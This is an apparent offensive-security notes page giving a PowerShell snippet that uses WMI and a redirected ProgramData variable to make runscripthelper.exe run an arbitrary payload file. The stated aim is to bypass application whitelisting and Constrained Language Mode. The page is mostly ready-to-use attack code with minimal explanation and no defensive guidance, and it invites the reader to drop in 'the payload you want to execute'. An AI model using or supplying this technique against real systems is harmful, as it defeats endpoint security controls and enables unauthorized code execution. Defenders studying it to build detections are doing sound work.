Bypass application whitelisting and CLM with runscripthelper and WMI

The snippet aims at bypassing application whitelisting by executing powershell code contained in a text file using runscripthelper.exe.

This code also bypasses CLM.

# place the payload you want to execute in C:\Test\Microsoft\Diagnosis\scripts\evil.txt
# the filename can be any name and extension you want

[String[]] $AllEnvVarsExceptLockdownPolicy = Get-ChildItem Env:\* -Exclude 'ProgramData' | % { "$($_.Name)=$($_.Value)" }
$AllEnvVarsExceptLockdownPolicy += 'ProgramData=C:\Test'

$StartParams = New-CimInstance -ClassName Win32_ProcessStartup -ClientOnly -Property @{
    EnvironmentVariables = $AllEnvVarsExceptLockdownPolicy
}

# give runscripthelper.exe what it needs to execute our malicious PowerShell
Invoke-CimMethod -ClassName Win32_Process -MethodName Create -Arguments @{
    CommandLine = 'C:\Windows\System32\runscripthelper.exe surfacecheck \\?\C:\Test\Microsoft\Diagnosis\scripts\evil.txt C:\Test'
    ProcessStartupInformation = $StartParams
}

References:

WMI - Windows Management Instrumentation

PreviousPowerShell Snippets NextCreate fake PowerShell logs

Last updated 5 months ago